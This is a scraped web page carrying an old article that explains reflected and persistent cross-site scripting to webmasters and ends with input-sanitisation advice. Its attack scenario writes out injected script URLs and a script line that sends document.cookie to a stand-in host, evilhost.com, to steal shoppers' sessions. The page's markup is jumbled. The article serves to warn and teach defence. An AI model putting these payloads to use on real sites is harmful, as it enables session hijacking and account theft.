|
XSS Vulnerabilities, So understimated, so dangerous
|
By Zinho
[Hits: 21165]
|
|
In this little paper I will try to convince admins, webmasterand in general everyone is concerned to secure a web site of howdangerous can be a XSS hole. I will not cover in depth what XSSis because there's a huge library on this topic available oninternet and on www.hackerscenter.com/library
--[ 2.0 XSS So what's XSS? XSS stands for cross site scripting,that is a way to inject script code into a web page making itexecute whenever the page loads or a specific event is triggered.
2.1 Temporary XSS
A factor because of which this kind of bug is understimated isdue to the "temporary xss" as I use to call them. Temporary xssare script codes executed only when a script code within acrafted input is issued by the user.
Example: http://vuln.host.com/search.asp?q=<![CDATA[<br><br>The above example will inject a "<plaintext>" tag in thesearch.asp page showing the source html code of the page Thepoint here is: Who searched for <plaintext> will see the sourcecode but this not implies any permanent alteration of the page.<br><br> 2.2 Permanent XSS<br><br>A "permanent XSS" as I use to call them, are due to unsanitizedinput by user that will be saved on a database for example. Eachtime these unsanitized fields are read from the database andprinted on the page the script will be executed. (A lot ofregistration forms server side scripts are affected by this kindof vuln)<br><br>--[ 3.0 Attacks<br><br>What I want to demonstrate in this article is how dangerous canbe a temporary xss. Most of the webmaster (99%, believe me),treat this kind of bug as very very low level issue because ofthe reasons we have seen. They think it is even a loss of timeto sanitize input that doesn't go into a database.<br><br>What they seem to be unable to understand is that whenever amalicious user is able to run a client side script from theirdomain name a cookie stealing attack can be *easily* taken. Thisbecomes a high level risk vuln when we deal with ecommerce site,webmail service and similar.<br><br> 3.1 Scenario 1<br><br>Let's assume that we've found a xss vuln into 2 sites. The firstwill be used as the "dumb" (A) site, that has a permanent xsshole, while the latter will be a big shopping portal (B) I wantto steal cookie from, that has "just" a little innocenttemporary xss hole.<br><br>We mail the big shopping portal admin about the vuln, trying tomake him understand how serious it is the bug. He never reply.So we decide to have some fun...innocent fun..as much innocentas their xss hole was, I suppose...<br><br>What one could do is to inject a stealth script into the dumbsite to force (always stealthly) every visitor of site A to loadthe vulnerable url we have found into site B. Here anyone canunderstand that evenhttp://vuln.host.com/search.asp?q=<plaintext> is now very veryuseful for our purpose. Instead of <plaintext>, we can usesomething like this: http://vuln.host.com/search.asp?q=<scriptsrc='http://myhosting.com/xsstrials/funny.js'></script><br><br>Funny.js will be our malicious script code that will be run onvuln.host.com domain ...and it will be similar to this: //Funny.js navigate to 'evilhost.com/collect_cookies.asp?cookie='+ document.cookie // where collect_cookies.asp will be a serverside script that will collect everything passed by parameter"cookie" and evilhost.com can be a hosting space set up by themalicious attacker.<br><br>So what happens here? 1. A user visits dumb site thus triggeringour permanent xss. 2. The permanent xss will load the pagehttp://vuln.host.com/search.asp?q=<scriptsrc='http://myhosting.com/xsstrials/funny.js'></script> thatexecutes funny.js thanks to the temporary xss hole in the bigshopping portal. 3. funny.js is now loaded on the big shoppingportal domain name letting us steal the cookie (and the logindata) of the dumb site visitor.<br><br> By "stealth script" we mean a script that doesn't change theappearance of the page so that no one will notice any backgroundwork.<br><br> -- [ Side effects<br><br>In this section I will show some side effects of the xss deseasethat are often forgotten or misunderstood by a lot ofanalysts/webmasters.<br><br>The xss holes, permanent and tempory ones, can be used to attacka local victim (visitor of the vulnerable site) directly byinjecting a malicious code capable of exploting a localvulnerability of the victim system. This has become very common(and easy to do) because of the tons of vulnerabilities thataffect Internet Explorer and the browsers in general. <br><br>Let's take for example a xss hole into trustedsite.com. Anyonecould take advantage of the trustness of this domain to executecode with high privilege levels, executing or installingmalicious activex. This kind of approach can be taken intoInternet Exlporer and in general in all the browsers that usethe so called trusted "Zones".<br><br>Another important issue that can make a simple XSS hole a highlevel risk issue is the capability of attacking thousandscomputers into few hours or even into minutes according to thetraffic of the vulnerable page. This kind of practice can leadto malware/adware spread. If a high traffic page is vulnerableto a permanent xss a malware/worm/adware coder can choose thiskind of approach to put the seeds of his worm making it spreadin a stealth manner and within few time.<br><br> -- [ How to solve the problem<br><br>Incredible to say, XSS holes are the most simple to solve andfix. They usually involve script tag but not always. Less knowncode can use the image tag with dynsrc or src parameters and"javascript:alert('aaa')" as argument or the <style> tag e.g. :<style type="text/javascript">script goes here</style><br><br> In general the characters to be sanitized are the usual "<" and">" but there are some more to be carefully escaped: &{code};will run the code into netscape / mozilla browsers so "&{"combination of chars should be sanitized too. In the 99% of thecases an "HTML Encode" would solve the problem. In asp it can beeasily done with the inbuilt functionserver.htmlencode(myparameter).<br><br> <br>
<script src="/plus/count.php?aid=80461&mid=0" language="javascript"></script>
<center></center>
</td>
<td style="vertical-align:top">
<script type="text/javascript"><!--
google_ad_client = "pub-9203237434407766";
google_ad_width = 160;
google_ad_height = 600;
google_ad_format = "160x600_as";
google_ad_type = "text_image";
//2007-07-10: txu_articles_bottom
google_ad_channel = "9900206766";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table>
</td>
<td width="224" align="right" valign="top">
<table width="98%" border="0" cellpadding="0" cellspacing="0" class="tbspan">
<tr>
<td class="guidet">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="gtb">
<tr>
<td height="29" background="/templets/img/31bg3.gif"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="32%" align="right"><img src="/templets/img/i.gif" width="10" height="13"></td>
<td width="2%"> </td>
<td width="66%" class="guidetitle"><strong>Top Articles</strong></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="50" valign="top" class="guideb">
*<a href="/site-security/three-spy-gadgets-every-homeowner-should-have-aid80416.htm">Three Spy Gadgets Every Homeow</a><br/>
*<a href="/site-security/the-necessity-of-spy-electronics-aid80431.htm">The Necessity of Spy Electroni</a><br/>
*<a href="/site-security/ordinary-objects-or-listening-devices--aid80432.htm">Ordinary Objects? Or Listening</a><br/>
*<a href="/site-security/buying-from-a-spy-shop-aid80442.htm">Buying From a Spy Shop</a><br/>
*<a href="/site-security/an-independent-perspective-on-implementation-of-access-control-systems-aid80453.htm">An Independent Perspective on </a><br/>
*<a href="/site-security/test-fidelity-with-a-spy-phone-aid80427.htm"> Test Fidelity with a Spy Phon</a><br/>
*<a href="/site-security/spy-ware-ad-ware-remove-them-now-aid80452.htm">Spy Ware, Ad Ware, Remove them</a><br/>
*<a href="/site-security/do-you-know-where-your-teen-is-you-do-with-spy-matrix-gps-aid80426.htm">Do You Know Where Your Teen Is</a><br/>
*<a href="/site-security/getting-the-right-spy-surveillance-product-for-your-needs-aid80438.htm">Getting the Right Spy Surveill</a><br/>
*<a href="/site-security/epokinc-identity-management-solutions-and-all-web-services-security-with-truste-aid80460.htm">EpokInc: Identity Management S</a><br/>
*<a href="/site-security/phishing-what-it-is-and-how-to-avoid-identity-theft--aid80459.htm">Phishing - What It Is and How </a><br/>
*<a href="/site-security/the-importance-of-the-right-spy-surveillance-product-aid80408.htm">The Importance of the Right Sp</a><br/>
</td>
</tr>
</table>
<table width="98%" border="0" cellpadding="0" cellspacing="0" class="tbspan">
<tr>
<td class="guidet">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="gtb">
<tr>
<td height="29" background="/templets/img/31bg3.gif"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="32%" align="right"><img src="/templets/img/i.gif" width="10" height="13"></td>
<td width="2%"> </td>
<td width="66%" class="guidetitle"><strong>Related Articles</strong></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="50" valign="top" class="guideb">
*<a href="/site-security/epokinc-identity-management-solutions-and-all-web-services-security-with-truste-aid80460.htm">EpokInc: Identity Management S</a><br/>
*<a href="/site-security/spyware-is-good-aid80462.htm">Spyware IS Good</a><br/>
*<a href="/site-security/phishing-what-it-is-and-how-to-avoid-identity-theft--aid80459.htm">Phishing - What It Is and How </a><br/>
*<a href="/site-security/nsauditor-network-security-auditor-aid80463.htm">Nsauditor: Network Security Au</a><br/>
*<a href="/site-security/silverguru-takes-on-freeadguru-co-aid80458.htm">SilverGuru takes on FreeAdGuru</a><br/>
*<a href="/site-security/is-your-website-image-up-to-par--aid80457.htm">Is Your Website Image Up to Pa</a><br/>
*<a href="/site-security/safely-surfing-the-internet-and-staying-free-from-spyware--aid80456.htm">Safely Surfing the Internet an</a><br/>
*<a href="/site-security/steps-forward-in-fighting-spyware-aid80455.htm">Steps Forward in Fighting Spyw</a><br/>
*<a href="/site-security/is-your-computer-infected-with-spyware--aid80454.htm">Is your Computer Infected with</a><br/>
*<a href="/site-security/an-independent-perspective-on-implementation-of-access-control-systems-aid80453.htm">An Independent Perspective on </a><br/>
*<a href="/site-security/spy-ware-ad-ware-remove-them-now-aid80452.htm">Spy Ware, Ad Ware, Remove them</a><br/>
*<a href="/site-security/the-differences-between-a-soft-hard-and-transmit-phone-tap-aid80451.htm">The Differences between a Soft</a><br/>
</td>
</tr>
</table></td>
</tr>
</table>
<div>
<br/><br/>
<b>Prev:</b> <a href='/site-security/epokinc-identity-management-solutions-and-all-web-services-security-with-truste-aid80460.htm'>EpokInc: Identity Management Solutions and all Web Services
Security with Truste</a> <b>Next: </b><a href='/site-security/spyware-is-good-aid80462.htm'>Spyware IS Good</a>
<br/><br/>
<script type="text/javascript"><!--
google_ad_client = "pub-9203237434407766";
google_ad_width = 728;
google_ad_height = 15;
google_ad_format = "728x15_0ads_al_s";
//2007-07-10: txu-articles_nav_bottom
google_ad_channel = "9256344755";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<br/><br/>
</div>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0" class="tbspan" style="margin-top:3px">
<tr>
<td height="51" background="/templets/img/31bg5.gif" valign="top"><img src='/templets/img/31c5.gif' width='4' height='49'></td>
<td background="/templets/img/31bg5.gif" align="center">
<a href='/'>Home</a>
| <a href="/plus/sitemap.html">Site Map</a>
| <a href='#' onClick="javascript:window.external.AddFavorite('http://localhost','T-XU Articles');">Bookmark this site</a>
| <a href="/plus/rssmap.html">T-XU RSS</a>
<hr style="height: 1px"/>
Copyright 2007 <a href='http://www.t-xu.com' target='_blank'>T-XU.com</a> - All Rights Reserved Worldwide.
</td>
<td background="/templets/img/31bg5.gif" align="right" valign="top"><img src='/templets/img/31c6.gif' width='4' height='49'></td>
</tr>
</table>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0" class="tbspan">
<tr><td height="6"></td></tr>
</table>
</center>
</body>
</html>
]]></plaintext></td></tr></table></td></tr></table></td></tr></div> | | |
